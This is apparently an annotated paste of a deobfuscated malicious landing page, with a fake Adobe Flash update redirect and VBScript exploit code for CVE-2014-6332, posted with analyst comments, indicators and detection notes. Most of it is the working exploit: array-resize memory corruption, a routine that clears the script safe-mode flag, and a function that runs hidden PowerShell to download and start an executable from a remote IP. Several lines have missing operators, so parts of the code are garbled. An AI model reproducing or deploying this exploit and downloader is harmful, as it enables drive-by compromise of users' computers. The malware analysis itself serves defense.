
HTML redirection + CVE-2014-6332 exploit

tehsyntx Feb 22nd, 2015 (edited) 375 Never
  1. ####
  2. Deobfuscated landing page of oxprxt.tk
  3. thembits.blogspot.com
  4. @tehsyntx
  5. ####
  6.  
  <!-- Analyst note: landing page markup as captured in this paste. For triage, the relevant
       parts are the forced legacy document mode, the timed redirect in the head, and the
       click-through image near the end of the body. The rest is lure content. -->
  7. <html><head>
  <!-- Requests IE8 emulation for this document; presumably so the VBScript blocks that
       follow the markup are still executed by newer IE versions (confirm per IE version). -->
  8. <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8">
  <!-- After 3 seconds the browser is sent to a page on the same host whose path imitates
       an Adobe Flash Player update site. Host and path are indicators for proxy/DNS logs. -->
  9. <meta http-equiv="refresh" content="3; url=http://oxprxt.tk/Adobe/get.adobe.com/flashplayer/flash_update.html">
  10. </head>
  11. <body background="bg.png">
  12. <title>Loading</title>
  13. <div style="text-align: center;"><IMG SRC="spacer top.png" ALT="image"></div>
  14. <div style="text-align: center;"><IMG SRC="sarah name.gif" ALT="image"></div>
  <!-- Paste lines 15-49: 35 identical hidden divs. No function is visible for them in this
       listing; they look like padding. -->
  15. <div style="visibility: hidden">My Hidden Text </div>
  16. <div style="visibility: hidden">My Hidden Text </div>
  17. <div style="visibility: hidden">My Hidden Text </div>
  18. <div style="visibility: hidden">My Hidden Text </div>
  19. <div style="visibility: hidden">My Hidden Text </div>
  20. <div style="visibility: hidden">My Hidden Text </div>
  21. <div style="visibility: hidden">My Hidden Text </div>
  22. <div style="visibility: hidden">My Hidden Text </div>
  23. <div style="visibility: hidden">My Hidden Text </div>
  24. <div style="visibility: hidden">My Hidden Text </div>
  25. <div style="visibility: hidden">My Hidden Text </div>
  26. <div style="visibility: hidden">My Hidden Text </div>
  27. <div style="visibility: hidden">My Hidden Text </div>
  28. <div style="visibility: hidden">My Hidden Text </div>
  29. <div style="visibility: hidden">My Hidden Text </div>
  30. <div style="visibility: hidden">My Hidden Text </div>
  31. <div style="visibility: hidden">My Hidden Text </div>
  32. <div style="visibility: hidden">My Hidden Text </div>
  33. <div style="visibility: hidden">My Hidden Text </div>
  34. <div style="visibility: hidden">My Hidden Text </div>
  35. <div style="visibility: hidden">My Hidden Text </div>
  36. <div style="visibility: hidden">My Hidden Text </div>
  37. <div style="visibility: hidden">My Hidden Text </div>
  38. <div style="visibility: hidden">My Hidden Text </div>
  39. <div style="visibility: hidden">My Hidden Text </div>
  40. <div style="visibility: hidden">My Hidden Text </div>
  41. <div style="visibility: hidden">My Hidden Text </div>
  42. <div style="visibility: hidden">My Hidden Text </div>
  43. <div style="visibility: hidden">My Hidden Text </div>
  44. <div style="visibility: hidden">My Hidden Text </div>
  45. <div style="visibility: hidden">My Hidden Text </div>
  46. <div style="visibility: hidden">My Hidden Text </div>
  47. <div style="visibility: hidden">My Hidden Text </div>
  48. <div style="visibility: hidden">My Hidden Text </div>
  49. <div style="visibility: hidden">My Hidden Text </div>
  50. <div style="text-align: center;"><IMG SRC="load.gif" ALT="image"></div>
  <!-- Image button: a click navigates to the same fake-update URL as the meta refresh, so
       the user reaches that page whether they wait or click. -->
  51. <div style="text-align: center;"><img src="b1.png" onmouseover="this.src='b2.png';" onmouseout="this.src='b1.png';"onclick="location.href='http://oxprxt.tk/Adobe/get.adobe.com/flashplayer/flash_update.html';" />;
  52. </body>
  53. </html>
  54.  
  55. <script language="VBScript">
  56.  
  ' runmumaa: payload stage. Called at the end of setnotsafemode() in the second script block.
  ' Creates the Shell.Application COM object and uses ShellExecute to start "powershell"
  ' with the command string in params; the last ShellExecute argument is 0 (hidden window).
  ' The command downloads an executable over HTTP into %APPDATA% and starts a file from
  ' that folder.
  ' Indicators on the params line: the download URL and the launched path %APPDATA%\Update.exe.
  ' Detection: a browser process spawning powershell.exe with Net.WebClient / DownloadFile
  ' on its command line, followed by a new executable written under %APPDATA%.
  57. function runmumaa()
  ' Errors are suppressed, so a failure here produces no script error dialog.
  58. On Error Resume Next
  59. set shell=createobject("Shell.Application")
  ' NOTE(review): "command" is not assigned anywhere in this listing.
  60. params="(New-Object System.Net.WebClient).DownloadFile('http://54.207.49.189/backend/ateb/Update.exe', $env:APPDATA   '\FILENAME.exe');$val = $env:APPDATA   '\Update.exe'; Start-Process $val" & command
  61.  
  62. shell.ShellExecute "powershell", params, "", "", 0
  63.  
  64. end function
  65.  
  66. </script>
  67.  
  68. <script language="VBScript">
  69.  
  ' Script-level state shared by every routine in this script block.
  ' aa and ab are the two dynamic arrays that the routines below resize repeatedly;
  ' a0..a3 hold the sizes and indexes used for those resizes.
  70. dim   aa()
  71. dim   ab()
  72. dim   a0
  73. dim   a1
  74. dim   a2
  75. dim   a3
  ' win9x is set in Begin() and Over(); intVersion is parsed from the user agent in Begin().
  76. dim   win9x
  77. dim   intVersion
  ' rnda and funclass are declared but not referenced anywhere else in this listing.
  78. dim   rnda
  79. dim   funclass
  ' myarray is filled in Begin() and read in mydata().
  80. dim   myarray
  81.  
  ' Entry point: runs as soon as this script block is executed, with no user interaction.
  82. Begin()
  83.  
  ' Begin: entry routine of the exploit script for the CVE named in the paste title.
  ' 1. Fingerprints the browser from the user agent and returns early if it contains
  '    "Win64" or does not contain "MSIE".
  ' 2. Calls BeginInit() and then Create(), which retries Over() until it reports success.
  ' 3. On success builds the myarray string and either calls runshellcode() (not defined
  '    in this listing) or setnotsafemode(), which ends by calling runmumaa().
  ' Every routine here uses On Error Resume Next, so failed attempts are silent to the user.
  84. function Begin()
  85.   On Error Resume Next
  86.   info=Navigator.UserAgent
  87.  
  ' 64-bit IE is skipped entirely.
  88.   if(instr(info,"Win64")>0)   then
  89.      exit   function
  90.   end if
  91.  
  ' Only Internet Explorer user agents proceed; the version number is parsed from the
  ' characters following "MSIE".
  92.   if (instr(info,"MSIE")>0)   then
  93.              intVersion = CInt(Mid(info, InStr(info, "MSIE")   5, 2))  
  94.   else
  95.      exit   function  
  96.              
  97.   end if
  98.  
  99.   win9x=0
  100.  
  101.   BeginInit()
  102.   If Create()=True Then
  ' Fixed sequence of 16-bit characters; mydata() later stores it into aa. Its meaning is
  ' not explained in the listing.
  103.      myarray=        chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)
  104.      myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0)
  105.  
  ' Versions below 4 take a separate path that writes the version into the page.
  106.      if(intVersion<4) then
  107.          document.write("<br> IE")
  108.          document.write(intVersion)
  109.          runshellcode()                    
  110.      else  
  111.           setnotsafemode()
  112.      end if
  113.   end if
  114. end function
  115.  
  ' BeginInit: seeds the random number generator, gives aa and ab an initial size of 5,
  ' and sets a0 and a3 from rnd(). Over() combines a0 and a3 on every attempt, so the
  ' array sizes differ between runs.
  ' NOTE(review): the listing is kept exactly as posted in the paste.
  116. function BeginInit()
  117.    Randomize()
  118.    redim aa(5)
  119.    redim ab(5)
  120.    a0=13 17*rnd(6)
  121.    a3=7 3*rnd(5)
  122. end function
  123.  
  ' Create: retry loop around Over(). Calls Over() up to 401 times (i = 0..400) and returns
  ' True as soon as one call returns True; returns False if none does.
  ' Defender note: this makes the page probabilistic, so one visit may fail where another succeeds.
  124. function Create()
  125.   On Error Resume Next
  126.   dim i
  127.   Create=False
  128.   For i = 0 To 400
  129.     If Over()=True Then
  ' Commented-out debug output of the attempt counter.
  130.     '   document.write(i)    
  131.       Create=True
  132.       Exit For
  133.    End If
  134.  Next
  135. end function
  136.  
  ' testaa: empty sub. Its only use in this listing is the assignment "i=testaa" in mydata().
  137. sub testaa()
  138. end sub
  139.  
  ' mydata: returns the value read back from aa(a1) after aa has been grown to a2 and ab(0)
  ' has been overwritten with a fixed double literal. setnotsafemode() passes the result to
  ' readmemo().
  ' NOTE(review): presumably the literals written to ab() change how the neighbouring aa
  ' element is interpreted (type confusion); the listing does not explain them. Confirm
  ' against a published analysis of the CVE before relying on this reading.
  140. function mydata()
  141.    On Error Resume Next
  142.     i=testaa
  143.     i=null
  ' Grow aa to the large bound a2 for the duration of the accesses below.
  144.     redim  Preserve aa(a2)  
  145.  
  146.     ab(0)=0
  147.     aa(a1)=i
  148.     ab(0)=6.36598737437801E-314
  149.  
  150.     aa(a1 2)=myarray
  151.     ab(2)=1.74088534731324E-310  
  152.     mydata=aa(a1)
  ' Shrink aa back to its normal size a0.
  153.     redim  Preserve aa(a0)  
  154. end function
  155.  
  156.  
  ' setnotsafemode: follows a chain of values obtained through readmemo(), scans a range of
  ' offsets (k = 0..&h60, step 4) for the value 14, overwrites the matching location with
  ' ab(4), and finally calls runmumaa().
  ' NOTE(review): going by the name, the value 14 is presumably the script engine's
  ' safe-mode flag and the write clears it, which would let runmumaa() create
  ' Shell.Application from web content. This is inferred from the name, not shown by
  ' the listing.
  ' Mitigation: apply the vendor fix for the CVE named in the paste title.
  157. function setnotsafemode()
  158.    On Error Resume Next
  159.    i=mydata()  
  160.    i=readmemo(i 8)
  161.    i=readmemo(i 16)
  162.    j=readmemo(i &h134)  
  163.    for k=0 to &h60 step 4
  164.        j=readmemo(i &h120 k)
  165.        if(j=14) then
  166.              j=0          
  ' aa is grown to a2 only around the single write and then shrunk again.
  167.              redim  Preserve aa(a2)            
  168.     aa(a1 2)(i &h11c k)=ab(4)
  169.              redim  Preserve aa(a0)  
  170.  
  171.     j=0
  ' The value is read again after the write; the result is not used afterwards.
  172.              j=readmemo(i &h120 k)  
  173.        
  174.               Exit for
  175.           end if
  176.  
  177.    next
  178.    ab(2)=1.69759663316747E-313
  ' runmumaa() is called whether or not the loop found a match.
  179.    runmumaa()
  180. end function
  181.  
  ' Over: one attempt of the array-resize step; Create() calls it in a loop.
  ' Each call changes a0 using a3, derives a1 and a2 from a0, resizes aa and ab, grows aa
  ' to the very large bound a2, and then inspects the VarType of the aa elements just past
  ' index a0.
  ' Returns True when that VarType equals &h2f66 or &hB9AD; the second value also sets
  ' win9x=1. Otherwise returns False. aa is shrunk back to a0 before returning.
  ' NOTE(review): the two marker values presumably indicate that aa and ab now overlap in
  ' memory; the listing does not explain them. Confirm before relying on this.
  182. function Over()
  183.    On Error Resume Next
  ' type2 and type3 are declared but never used in this routine.
  184.    dim type1,type2,type3
  185.    Over=False
  186.    a0=a0 a3
  187.    a1=a0 2
  188.    a2=a0 &h8000000
  189.  
  190.    redim  Preserve aa(a0)
  191.    redim   ab(a0)    
  192.  
  ' Errors from this resize are suppressed by On Error Resume Next.
  193.    redim  Preserve aa(a2)
  194.  
  195.    type1=1
  196.    ab(0)=1.123456789012345678901234567890
  197.    aa(a0)=10
  198.        
  199.    If(IsObject(aa(a1-1)) = False) Then
  ' Extra consistency check for versions below 4; on mismatch aa is shrunk back and the
  ' attempt is abandoned.
  200.       if(intVersion<4) then
  201.           mem=cint(a0 1)*16            
  202.           j=vartype(aa(a1-1))
  203.           if((j=mem 4) or (j*8=mem 8)) then
  204.              if(vartype(aa(a1-1))<>0)  Then    
  205.                 If(IsObject(aa(a1)) = False ) Then            
  206.                   type1=VarType(aa(a1))
  207.                 end if              
  208.              end if
  209.           else
  210.             redim  Preserve aa(a0)
  211.             exit  function
  212.  
  213.           end if
  214.        else
  215.           if(vartype(aa(a1-1))<>0)  Then    
  216.              If(IsObject(aa(a1)) = False ) Then
  217.                  type1=VarType(aa(a1))
  218.              end if              
  219.            end if
  220.        end if
  221.    end if
  222.            
  223.  
  ' Success is decided only by the VarType value captured above.
  224.    If(type1=&h2f66) Then        
  225.          Over=True      
  226.    End If  
  227.    If(type1=&hB9AD) Then
  228.          Over=True
  229.          win9x=1
  230.    End If  
  231.  
  232.    redim  Preserve aa(a0)          
  233.      
  234. end function
  235.  
  ' ReadMemo: takes a numeric value "add", stores a value derived from it in aa(a1) while
  ' aa is grown to a2, overwrites ab(0) with a fixed double literal, and returns
  ' lenb(aa(a1)). ab(0) is reset to 0 and aa is shrunk back to a0 before returning.
  ' setnotsafemode() uses the result as the value found at a given location.
  ' NOTE(review): this presumably works as a memory-read helper that relies on the overlap
  ' established by Over(); the listing does not state that. Confirm against a published
  ' analysis of the CVE.
  236. function ReadMemo(add)
  237.    On Error Resume Next
  238.    redim  Preserve aa(a2)  
  239.  
  240.    ab(0)=0  
  241.    aa(a1)=add 4    
  242.    ab(0)=1.69759663316747E-313      
  243.    ReadMemo=lenb(aa(a1))  
  244.  
  245.    ab(0)=0    
  246.  
  247.    redim  Preserve aa(a0)
  248. end function
  249.  
  250. </script>